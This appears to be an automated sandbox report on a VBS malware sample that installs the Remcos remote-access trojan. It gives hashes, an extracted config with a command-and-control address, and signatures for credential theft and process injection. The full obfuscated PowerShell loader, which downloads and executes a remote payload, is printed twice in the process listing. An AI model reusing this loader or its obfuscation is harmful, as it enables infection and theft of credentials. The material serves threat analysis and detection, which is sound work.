Analysis
-
max time kernel
148s -
max time network
150s -
platform
windows7_x64 -
resource
win7-20240729-en -
resource tags
arch:x64arch:x86image:win7-20240729-enlocale:en-usos:windows7-x64system -
submitted
10-12-2024 03:10
Static task
static1
Behavioral task
behavioral1
Sample
93b79b0841dde75560e2543e48c061a8dbad62f8cfdd8a5f4ae6a2c2d61cb95f.vbs
Resource
win7-20240729-en
Behavioral task
behavioral2
Sample
93b79b0841dde75560e2543e48c061a8dbad62f8cfdd8a5f4ae6a2c2d61cb95f.vbs
Resource
win10v2004-20241007-en
General
-
Target
93b79b0841dde75560e2543e48c061a8dbad62f8cfdd8a5f4ae6a2c2d61cb95f.vbs
-
Size
13KB
-
MD5
d40ca4d26ab8bbb252f9ec0485bac149
-
SHA1
6111855a1b26ebac8e5ac2666f3810e8b53b6909
-
SHA256
93b79b0841dde75560e2543e48c061a8dbad62f8cfdd8a5f4ae6a2c2d61cb95f
-
SHA512
f61343e332cda4dd4e9ecc5ce73d246287eb57435e3ca86d764e0923e2124c1f5245edcf96dddc054d395afc53b9586f63a258616e7765d1178c74e20c51d668
-
SSDEEP
384:pS5TdOi2U5/HSdiZc4EWBFH4yjPXrJY3s8v0x:pCBOE/MiqZWBFH4uJPJ
Malware Config
Extracted
remcos
RemoteHost
154.216.18.157:2404
-
audio_folder
MicRecords
-
audio_record_time
5
-
connect_delay
0
-
connect_interval
1
-
copy_file
remcos.exe
-
copy_folder
Remcos
-
delete_file
false
-
hide_file
false
-
hide_keylog_file
false
-
install_flag
false
-
keylog_crypt
false
-
keylog_file
logs.dat
-
keylog_flag
false
-
keylog_folder
remcos
-
mouse_option
false
-
mutex
Rmc-N639VY
-
screenshot_crypt
false
-
screenshot_flag
false
-
screenshot_folder
Screenshots
-
screenshot_path
%AppData%
-
screenshot_time
10
-
take_screenshot_option
false
-
take_screenshot_time
5
Signatures
-
Remcos family
-
Detected Nirsoft tools 3 IoCs
Free utilities often used by attackers which can steal passwords, product keys, etc.
resource yara_rule behavioral1/memory/1324-57-0x0000000000400000-0x0000000000424000-memory.dmp Nirsoft behavioral1/memory/3044-54-0x0000000000400000-0x0000000000462000-memory.dmp Nirsoft behavioral1/memory/2108-47-0x0000000000400000-0x0000000000478000-memory.dmp Nirsoft -
NirSoft MailPassView 1 IoCs
Password recovery tool for various email clients
resource yara_rule behavioral1/memory/3044-54-0x0000000000400000-0x0000000000462000-memory.dmp MailPassView -
NirSoft WebBrowserPassView 1 IoCs
Password recovery tool for various web browsers
resource yara_rule behavioral1/memory/2108-47-0x0000000000400000-0x0000000000478000-memory.dmp WebBrowserPassView -
Blocklisted process makes network request 6 IoCs
flow pid Process 5 2876 powershell.exe 7 2248 msiexec.exe 9 2248 msiexec.exe 10 2248 msiexec.exe 11 2248 msiexec.exe 13 2248 msiexec.exe -
Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts msiexec.exe -
Enumerates connected drives 3 TTPs 1 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\Z: WScript.exe -
Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
pid Process 2248 msiexec.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
pid Process 2456 powershell.exe 2248 msiexec.exe -
Suspicious use of SetThreadContext 3 IoCs
description pid Process procid_target PID 2248 set thread context of 2108 2248 msiexec.exe 36 PID 2248 set thread context of 3044 2248 msiexec.exe 37 PID 2248 set thread context of 1324 2248 msiexec.exe 38 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 5 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language msiexec.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language msiexec.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language msiexec.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language msiexec.exe -
Suspicious behavior: EnumeratesProcesses 5 IoCs
pid Process 2876 powershell.exe 2456 powershell.exe 2456 powershell.exe 2108 msiexec.exe 2108 msiexec.exe -
Suspicious behavior: MapViewOfSection 4 IoCs
pid Process 2456 powershell.exe 2248 msiexec.exe 2248 msiexec.exe 2248 msiexec.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
description pid Process Token: SeDebugPrivilege 2876 powershell.exe Token: SeDebugPrivilege 2456 powershell.exe Token: SeDebugPrivilege 1324 msiexec.exe -
Suspicious use of WriteProcessMemory 35 IoCs
description pid Process procid_target PID 1744 wrote to memory of 2876 1744 WScript.exe 30 PID 1744 wrote to memory of 2876 1744 WScript.exe 30 PID 1744 wrote to memory of 2876 1744 WScript.exe 30 PID 2456 wrote to memory of 2248 2456 powershell.exe 34 PID 2456 wrote to memory of 2248 2456 powershell.exe 34 PID 2456 wrote to memory of 2248 2456 powershell.exe 34 PID 2456 wrote to memory of 2248 2456 powershell.exe 34 PID 2456 wrote to memory of 2248 2456 powershell.exe 34 PID 2456 wrote to memory of 2248 2456 powershell.exe 34 PID 2456 wrote to memory of 2248 2456 powershell.exe 34 PID 2456 wrote to memory of 2248 2456 powershell.exe 34 PID 2248 wrote to memory of 2108 2248 msiexec.exe 36 PID 2248 wrote to memory of 2108 2248 msiexec.exe 36 PID 2248 wrote to memory of 2108 2248 msiexec.exe 36 PID 2248 wrote to memory of 2108 2248 msiexec.exe 36 PID 2248 wrote to memory of 2108 2248 msiexec.exe 36 PID 2248 wrote to memory of 2108 2248 msiexec.exe 36 PID 2248 wrote to memory of 2108 2248 msiexec.exe 36 PID 2248 wrote to memory of 2108 2248 msiexec.exe 36 PID 2248 wrote to memory of 3044 2248 msiexec.exe 37 PID 2248 wrote to memory of 3044 2248 msiexec.exe 37 PID 2248 wrote to memory of 3044 2248 msiexec.exe 37 PID 2248 wrote to memory of 3044 2248 msiexec.exe 37 PID 2248 wrote to memory of 3044 2248 msiexec.exe 37 PID 2248 wrote to memory of 3044 2248 msiexec.exe 37 PID 2248 wrote to memory of 3044 2248 msiexec.exe 37 PID 2248 wrote to memory of 3044 2248 msiexec.exe 37 PID 2248 wrote to memory of 1324 2248 msiexec.exe 38 PID 2248 wrote to memory of 1324 2248 msiexec.exe 38 PID 2248 wrote to memory of 1324 2248 msiexec.exe 38 PID 2248 wrote to memory of 1324 2248 msiexec.exe 38 PID 2248 wrote to memory of 1324 2248 msiexec.exe 38 PID 2248 wrote to memory of 1324 2248 msiexec.exe 38 PID 2248 wrote to memory of 1324 2248 msiexec.exe 38 PID 2248 wrote to memory of 1324 2248 msiexec.exe 38
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\93b79b0841dde75560e2543e48c061a8dbad62f8cfdd8a5f4ae6a2c2d61cb95f.vbs"1⤵
- Enumerates connected drives
- Suspicious use of WriteProcessMemory
PID:1744 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ";$Krystalklart='Forskrivelse';;$slidsede='Vogtedes';;$kokosmaatte='Macadamized';;$Renseriers='soapers151';;$Predeluded=$host.Name;function Underrettendes($Pakeha10nsurrectionising){If ($Predeluded) {$Anklageskrifts=3} for ($Pakeha10=$Anklageskrifts;;$Pakeha10+=4){if(!$Pakeha10nsurrectionising[$Pakeha10]){cls;break }$Narra+=$Pakeha10nsurrectionising[$Pakeha10];$Kurvs='Delibererende'}$Narra}function Jasmone($Erythron179){ .($Itchings8) ($Erythron179)}$Phosphates=Underrettendes ' VaNsynEstaT yp.DooW';$Phosphates+=Underrettendes 'MiseG dbH ycBioL AniKlue.agnLavt';$Uncombable=Underrettendes '.erMAfro,aszFroiAnal xyl Emasem/';$Bowralite=Underrettendes ' ArTFodl KusIke1Vrt2';$Etatsassistenters='swe[surNBarElogt df.intsKriE TerBo VblaIWayC breUngpKr.O ei,rin D tEurmMalAMnsn Hyas ngDiaeHunrGyl]E b: Jo:KamsseneForCVenUsa rF,ri AntforYs opfasRAlco orTbenos,nCUdsoAfrlsh = B $ NrBBlao orw.idr O ARayL ReI RaT axE';$Uncombable+=Underrettendes 'ulr5Uni.For0I l c g(ArvWRaniCymnAggdForoBrywG vs st unNIntT ,e Co1U h0Odo.Os.0Und; Un vrgWPumiDren Cr6El 4st ;Vid Elx ns6Tye4 st;Pos MiarKafv e:,et1Tre3sea1Pos.H d0Em )Rrh UnoGBese Uncs rk skoAbk/ La2Ele0 Ta1Tro0non0Bow1 Uu0Zy.1Pre s mFGeniC orDoceGrufBanoM dxPo /Gev1Bac3Bil1spe.Ka 0';$Merkurokrom=Underrettendes 'ChoUsmrs UnEFlyRHov-mufA sygbruEDeenOv T';$Omarbejdende=Underrettendes ' Twh sytF,at VdpJansPse: ke/sis/Af kHosbsta1Re usup. AliMatccomu se/scuYA.fU FlAB aoQuajMagH GlyMinbLid/UnvV oeeJe s ektskreskonFraeMan. T,cUnasBlov';$Forstenelserne57=Underrettendes 'Fy >';$Itchings8=Underrettendes ' aIUnce arx';$xenogenic='Basisord';$Klkningsprocesser='\Bauno.Opk';Jasmone (Underrettendes 'Ch.$El GLanl OpO CibPriATidLs y:AjlmU.daMeegExpNVitecarT ArPRebl nnARkkdBibe BaRMotsrek=Yde$ThiE ran ntvCr : MaAs,uPPr pslrdAfta V TPa AE e+Br.$Oi.KU jL.prkOu.nPerIPieNsinGQuis F,p rRAstoGonCr pE ursCifsOveeTowr');Jasmone (Underrettendes 'Bra$Uneg llDraotjrb Tras.elTre:AfssRekPK sHEryeTe rTiloWhimBanE,ngT.auri dEAg s nb=Reb$BusoPebm KoaGa RA sB inEJaujstoDs peOv NGraD ore s,..ynsKonPs aLTegIBlotBuh( Mu$ DoFEksOsofrRefsB uTEn eRrsn erEZinl ,us,irEsciRResN Ine Ar5U b7J e)');Jasmone (Underrettendes $Etatsassistenters);$Omarbejdende=$spherometres[0];$Benumbing=(Underrettendes ' Le$H.sg.agl opoRo.BPutaTypl fo:FabA HaM chiPladVrdOA eKsuceNeoT HyOEnsNUnsE nd=Py nPateRetW pl- AnoMa BBeljMa.E smCDriT,em FosJobYC lsImmtOp.EsttM Ca.Ca $PropDa H UlO edsTolPst hU taRunTPhiEDr s');Jasmone ($Benumbing);Jasmone (Underrettendes 'Tur$HelaIn.m Foi .edBesoz,nk tie IntFreos nnFibeG l.OveHKrve.huaCe,dNonetryrE vsAgt[Ind$ joM steVanrOpkk WhuTekrMo oRipkMagr P oDammBri] T =Vic$BraUstinsvmc ImoRotmtaqbWalaBagbImil ele');$Guldtrykkene=Underrettendes ' ds$AluaLarmsteiInsdskroKa ksvrestutGlaoDr n ilesto.,myDF lo ZewVa nImpl InosemasendchoFN,bi.mrlBa,eT p(Tr $ ArO MamEmiaDifrEtnb une dfjFrydWooeKapn JedDree Fo,sys$re.V HuoDa lTartRemaNekg or sta UdpPolhUt,yT m)';$Voltagraphy=$magnetpladers;Jasmone (Underrettendes 'L p$Ko GPerL,icoNonBReca ieLRum: sipNonO.raTOxie MoNs.isGnaR,ncKAn k MiEKon=.ip(Udft TreEqus rTTod-I ePbolaVenTPaahDas Fre$snovRivOst Lsy tUdlAunlGsolRM.ca enPslhH boYHyp)');while (!$Potensrkke) {Jasmone (Underrettendes 'buc$V ngs,dlst,o ilbposa.orl Pr:AluPssthPeryprst VoaKems olePle=Kry$P,lNs sysommHo fMi,eEffnUnrs') ;Jasmone $Guldtrykkene;Jasmone (Underrettendes 'so.sHo tAffACraRs ntsta- r,sV nl DiEmi EFacPAut A,e4');Jasmone (Underrettendes ' G $an,GWa,lThioMdrBKl aCo LEnd: upAvaorygTLoce I n,qasConrFixKPrek LgELig=D l(Ymptbafe B s eltUdp- UnpF nA svTKerhPre syn$sneVFo OMesl TutBjeaskrg T.r snAI pPEleHBetYBl )') ;Jasmone (Underrettendes ' st$sorgTchLArmoEccBCykAOp lCal:s tI hen susanop VaEQu c emT CiREc.Ipa xFro= a$EmaGM.nL WhORecbE taBrelFal: K gRu,RWa.uNone etVoy+ st+b,u% Fe$sulsAutPDilHsteE olRBreOOveM .tEBi TC,rrE,deP,lsInf.sk Cu.boForuFrenCynt') ;$Omarbejdende=$spherometres[$Inspectrix]}$Alpakaernes=321905;$Temporomaxillary=30497;Jasmone (Underrettendes 'Kar$M sg sklBinoAntbskoA idlst :Prss,odtp riTe,lIntpsamEa.sRB.ti AnO U DMo,eKodRschnpreE L A t=Ant Ec,g,ameVa.TDel-H kCo.touptNPitTCirEsheNNejtHal u$BomvR.dOGhaLVogTspraRefgCaurRafA.alpUdtH P y');Jasmone (Underrettendes 'Cou$Yvegundlsanosmrb woa A la.l: ejPKuri I nstedLune F n ynsspi Inv=Pee Por[soms PoyB vspletUl e,ormViv.R.fCHyposejnAtrv nteM lr ent.aa] ov:sti: ChF.urrA to PambedB,raaFy s PeeK,m6,db4 G,s LotBrorHypi esnNeagRay(Dev$skusKomtIndiColl,oapkree .arUncischo rkdForeGr r F nOx eHo.)');Jasmone (Underrettendes 'su,$ Kag ByLs oOUdtBOpsa AfLfor:RusgR.gAsubssa tsonr.tao s.LMicABarVFo ARetGLnie Gn2 Ej6sk. Ine= a Emb[GarsCilyVers UdTAarE OmmYmt..kitPreese.XHaeT im. ydEOccNDiaCPuloMilD alIM,nnAbsG un]D z:Pt.:Fo.AG ys FlC edIVi I.ar. ,mGskaEEteTTilsAleTRe,RC rIAfhnMyoGGoe(Emy$K,oPL eIIndNRebDDateKlinO.tsPli)');Jasmone (Underrettendes 'Chi$ eG InLLemOsupb B.AMidL t:pr EKampoppIBrdsKl cde,l MiEsemRAdrIUbrtPenIM.lsTur=sen$ scgM sA Hos smT Blrfaro kolKanA ehV ilA,ouGBloE He2N r6 in.sulsTatUstobUntsMalTNonRAttiJvnnF,rGHvi( D $ OpAKulLLonP pha Opkdi ACloEsterernNAnteUn sAfs, Mu$satt s.E nnmUdlpAfto u.RPulo ChMHo,AM,dXT oiAniL P,lAk AAftRCarys,a)');Jasmone $Episcleritis;"2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2876
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" ";$Krystalklart='Forskrivelse';;$slidsede='Vogtedes';;$kokosmaatte='Macadamized';;$Renseriers='soapers151';;$Predeluded=$host.Name;function Underrettendes($Pakeha10nsurrectionising){If ($Predeluded) {$Anklageskrifts=3} for ($Pakeha10=$Anklageskrifts;;$Pakeha10+=4){if(!$Pakeha10nsurrectionising[$Pakeha10]){cls;break }$Narra+=$Pakeha10nsurrectionising[$Pakeha10];$Kurvs='Delibererende'}$Narra}function Jasmone($Erythron179){ .($Itchings8) ($Erythron179)}$Phosphates=Underrettendes ' VaNsynEstaT yp.DooW';$Phosphates+=Underrettendes 'MiseG dbH ycBioL AniKlue.agnLavt';$Uncombable=Underrettendes '.erMAfro,aszFroiAnal xyl Emasem/';$Bowralite=Underrettendes ' ArTFodl KusIke1Vrt2';$Etatsassistenters='swe[surNBarElogt df.intsKriE TerBo VblaIWayC breUngpKr.O ei,rin D tEurmMalAMnsn Hyas ngDiaeHunrGyl]E b: Jo:KamsseneForCVenUsa rF,ri AntforYs opfasRAlco orTbenos,nCUdsoAfrlsh = B $ NrBBlao orw.idr O ARayL ReI RaT axE';$Uncombable+=Underrettendes 'ulr5Uni.For0I l c g(ArvWRaniCymnAggdForoBrywG vs st unNIntT ,e Co1U h0Odo.Os.0Und; Un vrgWPumiDren Cr6El 4st ;Vid Elx ns6Tye4 st;Pos MiarKafv e:,et1Tre3sea1Pos.H d0Em )Rrh UnoGBese Uncs rk skoAbk/ La2Ele0 Ta1Tro0non0Bow1 Uu0Zy.1Pre s mFGeniC orDoceGrufBanoM dxPo /Gev1Bac3Bil1spe.Ka 0';$Merkurokrom=Underrettendes 'ChoUsmrs UnEFlyRHov-mufA sygbruEDeenOv T';$Omarbejdende=Underrettendes ' Twh sytF,at VdpJansPse: ke/sis/Af kHosbsta1Re usup. AliMatccomu se/scuYA.fU FlAB aoQuajMagH GlyMinbLid/UnvV oeeJe s ektskreskonFraeMan. T,cUnasBlov';$Forstenelserne57=Underrettendes 'Fy >';$Itchings8=Underrettendes ' aIUnce arx';$xenogenic='Basisord';$Klkningsprocesser='\Bauno.Opk';Jasmone (Underrettendes 'Ch.$El GLanl OpO CibPriATidLs y:AjlmU.daMeegExpNVitecarT ArPRebl nnARkkdBibe BaRMotsrek=Yde$ThiE ran ntvCr : MaAs,uPPr pslrdAfta V TPa AE e+Br.$Oi.KU jL.prkOu.nPerIPieNsinGQuis F,p rRAstoGonCr pE ursCifsOveeTowr');Jasmone (Underrettendes 'Bra$Uneg llDraotjrb Tras.elTre:AfssRekPK sHEryeTe rTiloWhimBanE,ngT.auri dEAg s nb=Reb$BusoPebm KoaGa RA sB inEJaujstoDs peOv NGraD ore s,..ynsKonPs aLTegIBlotBuh( Mu$ DoFEksOsofrRefsB uTEn eRrsn erEZinl ,us,irEsciRResN Ine Ar5U b7J e)');Jasmone (Underrettendes $Etatsassistenters);$Omarbejdende=$spherometres[0];$Benumbing=(Underrettendes ' Le$H.sg.agl opoRo.BPutaTypl fo:FabA HaM chiPladVrdOA eKsuceNeoT HyOEnsNUnsE nd=Py nPateRetW pl- AnoMa BBeljMa.E smCDriT,em FosJobYC lsImmtOp.EsttM Ca.Ca $PropDa H UlO edsTolPst hU taRunTPhiEDr s');Jasmone ($Benumbing);Jasmone (Underrettendes 'Tur$HelaIn.m Foi .edBesoz,nk tie IntFreos nnFibeG l.OveHKrve.huaCe,dNonetryrE vsAgt[Ind$ joM steVanrOpkk WhuTekrMo oRipkMagr P oDammBri] T =Vic$BraUstinsvmc ImoRotmtaqbWalaBagbImil ele');$Guldtrykkene=Underrettendes ' ds$AluaLarmsteiInsdskroKa ksvrestutGlaoDr n ilesto.,myDF lo ZewVa nImpl InosemasendchoFN,bi.mrlBa,eT p(Tr $ ArO MamEmiaDifrEtnb une dfjFrydWooeKapn JedDree Fo,sys$re.V HuoDa lTartRemaNekg or sta UdpPolhUt,yT m)';$Voltagraphy=$magnetpladers;Jasmone (Underrettendes 'L p$Ko GPerL,icoNonBReca ieLRum: sipNonO.raTOxie MoNs.isGnaR,ncKAn k MiEKon=.ip(Udft TreEqus rTTod-I ePbolaVenTPaahDas Fre$snovRivOst Lsy tUdlAunlGsolRM.ca enPslhH boYHyp)');while (!$Potensrkke) {Jasmone (Underrettendes 'buc$V ngs,dlst,o ilbposa.orl Pr:AluPssthPeryprst VoaKems olePle=Kry$P,lNs sysommHo fMi,eEffnUnrs') ;Jasmone $Guldtrykkene;Jasmone (Underrettendes 'so.sHo tAffACraRs ntsta- r,sV nl DiEmi EFacPAut A,e4');Jasmone (Underrettendes ' G $an,GWa,lThioMdrBKl aCo LEnd: upAvaorygTLoce I n,qasConrFixKPrek LgELig=D l(Ymptbafe B s eltUdp- UnpF nA svTKerhPre syn$sneVFo OMesl TutBjeaskrg T.r snAI pPEleHBetYBl )') ;Jasmone (Underrettendes ' st$sorgTchLArmoEccBCykAOp lCal:s tI hen susanop VaEQu c emT CiREc.Ipa xFro= a$EmaGM.nL WhORecbE taBrelFal: K gRu,RWa.uNone etVoy+ st+b,u% Fe$sulsAutPDilHsteE olRBreOOveM .tEBi TC,rrE,deP,lsInf.sk Cu.boForuFrenCynt') ;$Omarbejdende=$spherometres[$Inspectrix]}$Alpakaernes=321905;$Temporomaxillary=30497;Jasmone (Underrettendes 'Kar$M sg sklBinoAntbskoA idlst :Prss,odtp riTe,lIntpsamEa.sRB.ti AnO U DMo,eKodRschnpreE L A t=Ant Ec,g,ameVa.TDel-H kCo.touptNPitTCirEsheNNejtHal u$BomvR.dOGhaLVogTspraRefgCaurRafA.alpUdtH P y');Jasmone (Underrettendes 'Cou$Yvegundlsanosmrb woa A la.l: ejPKuri I nstedLune F n ynsspi Inv=Pee Por[soms PoyB vspletUl e,ormViv.R.fCHyposejnAtrv nteM lr ent.aa] ov:sti: ChF.urrA to PambedB,raaFy s PeeK,m6,db4 G,s LotBrorHypi esnNeagRay(Dev$skusKomtIndiColl,oapkree .arUncischo rkdForeGr r F nOx eHo.)');Jasmone (Underrettendes 'su,$ Kag ByLs oOUdtBOpsa AfLfor:RusgR.gAsubssa tsonr.tao s.LMicABarVFo ARetGLnie Gn2 Ej6sk. Ine= a Emb[GarsCilyVers UdTAarE OmmYmt..kitPreese.XHaeT im. ydEOccNDiaCPuloMilD alIM,nnAbsG un]D z:Pt.:Fo.AG ys FlC edIVi I.ar. ,mGskaEEteTTilsAleTRe,RC rIAfhnMyoGGoe(Emy$K,oPL eIIndNRebDDateKlinO.tsPli)');Jasmone (Underrettendes 'Chi$ eG InLLemOsupb B.AMidL t:pr EKampoppIBrdsKl cde,l MiEsemRAdrIUbrtPenIM.lsTur=sen$ scgM sA Hos smT Blrfaro kolKanA ehV ilA,ouGBloE He2N r6 in.sulsTatUstobUntsMalTNonRAttiJvnnF,rGHvi( D $ OpAKulLLonP pha Opkdi ACloEsterernNAnteUn sAfs, Mu$satt s.E nnmUdlpAfto u.RPulo ChMHo,AM,dXT oiAniL P,lAk AAftRCarys,a)');Jasmone $Episcleritis;"1⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2456 -
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\SysWOW64\msiexec.exe"2⤵
- Blocklisted process makes network request
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:2248 -
C:\Windows\SysWOW64\msiexec.exeC:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\vrzbswqsoomy"3⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:2108
-
-
C:\Windows\SysWOW64\msiexec.exeC:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\flettpalcwecdqbg"3⤵
- Accesses Microsoft Outlook accounts
- System Location Discovery: System Language Discovery
PID:3044
-
-
C:\Windows\SysWOW64\msiexec.exeC:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\injmuhlnqewhfwxkeud"3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:1324
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2B
MD5f3b25701fe362ec84616a93a45ce9998
SHA1d62636d8caec13f04e28442a0a6fa1afeb024bbb
SHA256b3d510ef04275ca8e698e5b3cbb0ece3949ef9252f0cdc839e9ee347409a2209
SHA51298c5f56f3de340690c139e58eb7dac111979f0d4dffe9c4b24ff849510f4b6ffa9fd608c0a3de9ac3c9fd2190f0efaf715309061490f9755a9bfdf1c54ca0d84
-
Filesize
458KB
MD58fe36deb262588f592f3aacd05e1cedb
SHA1b4b108ef76b5238550c6e13ab9a980ffcca7f079
SHA25658796c6c0ced7e671deb8eed05fb0b5adfc02849b392b7b7c897656d205f6ac1
SHA512a31622be04241639ff09101a97caea42f1925e37a59bcc968cf6311b535df0033df1d974f40abf5983a47795b32a6a218a5260907b4391e5479c13a796303577
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\5W4AB8WL7IPT9R5CBHQA.temp
Filesize7KB
MD57b659ef5ad663170ca895a46e2bbe1ec
SHA12a947965486515164e26ca2ce5731f3e35843aa7
SHA2566c00007623d22c1e468573d84a17e3912325bd876236eb2217c6f4deab491408
SHA5126af46dd887aff4d588fbb0b47364afea5d00e005ae9144cb5c3bda2230e081c13d7477d312e73a12698c698f71e823342006a226702fc72c346e535da2b12908